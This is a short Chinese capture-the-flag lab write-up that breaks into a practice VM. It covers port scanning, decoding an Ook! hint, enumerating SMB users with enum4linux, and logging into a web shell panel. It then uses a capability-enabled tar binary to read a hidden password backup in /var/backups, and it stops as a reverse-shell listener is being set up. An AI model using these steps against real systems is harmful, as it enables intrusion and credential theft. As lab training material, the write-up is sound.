一、下载地址
二、渗透记录
1.信息搜集
- 打开靶机,自动获取到靶机ip:192.168.32.141,省的去探测对应的ip
- 进行扫描探测对应的端口以及服务信息,主要内容为,端口:80、10000、20000;版本:samba。
- 进入80端口,查看编码,发现有段话,发现是ook!加密,进行解密。Brainfuck/OoK加密解密 - Bugku CTF
- 这个时候有了某个账户的密码之后,就剩用户名了,这个时候碰见了samba,所以用上了enum4linux这个工具,专业用于扫描smb服务的,用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居由它实现。一般共享文件夹和打印机使用较多。
enum4linux -a 192.168.32.141
,得到用户名cyber
2.进一步渗透
- 访问192.168.32.141:20000,登录。(10000端口那个进不去),发现有一个shell的交互界面,点击进入。
- 发现第一个flag,在user.txt文件下
- 在/var/backups下找到一个隐藏文件,.old_pass.bak
- 利用我们之前看到的tar对其先进行压缩,后解压缩的操作,将其可以打开
//压缩
//tar前要加./,为的就剩区分此时的./tar不是系统内置的,而是我们从前面找到的
./tar -cvf pass.tar /var/backups/.old_pass.bak
//解压缩
tar -xvf pass.tar
- 发现登陆不上,选择使用反弹shell的形式进行登录
建立监听端口12345
再网页中输入